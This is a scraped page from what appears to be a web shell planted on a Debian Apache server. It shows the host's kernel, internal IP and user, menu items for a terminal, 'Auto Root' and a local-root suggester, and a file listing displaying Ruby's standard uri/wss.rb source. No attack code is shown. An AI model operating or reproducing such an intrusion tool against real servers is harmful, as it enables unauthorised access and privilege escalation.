Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
ruby /
3.1.0 /
uri /
Delete
Unzip
Name
Size
Permission
Date
Action
common.rb
18.71
KB
-rw-r--r--
2022-04-12 11:11
file.rb
2.02
KB
-rw-r--r--
2022-04-12 11:11
ftp.rb
7.03
KB
-rw-r--r--
2022-04-12 11:11
generic.rb
36.71
KB
-rw-r--r--
2022-04-12 11:11
http.rb
3.64
KB
-rw-r--r--
2022-04-12 11:11
https.rb
558
B
-rw-r--r--
2022-04-12 11:11
ldap.rb
5.78
KB
-rw-r--r--
2022-04-12 11:11
ldaps.rb
511
B
-rw-r--r--
2022-04-12 11:11
mailto.rb
7.82
KB
-rw-r--r--
2022-04-12 11:11
rfc2396_parser.rb
17.04
KB
-rw-r--r--
2022-04-12 11:11
rfc3986_parser.rb
5.86
KB
-rw-r--r--
2022-04-12 11:11
version.rb
150
B
-rw-r--r--
2022-04-12 11:11
ws.rb
2.24
KB
-rw-r--r--
2022-04-12 11:11
wss.rb
531
B
-rw-r--r--
2022-04-12 11:11
Save
Rename
# frozen_string_literal: false # = uri/wss.rb # # Author:: Matt Muller <mamuller@amazon.com> # License:: You can redistribute it and/or modify it under the same term as Ruby. # # See URI for general documentation # require_relative 'ws' module URI # The default port for WSS URIs is 443, and the scheme is 'wss:' rather # than 'ws:'. Other than that, WSS URIs are identical to WS URIs; # see URI::WS. class WSS < WS # A Default port of 443 for URI::WSS DEFAULT_PORT = 443 end register_scheme 'WSS', WSS end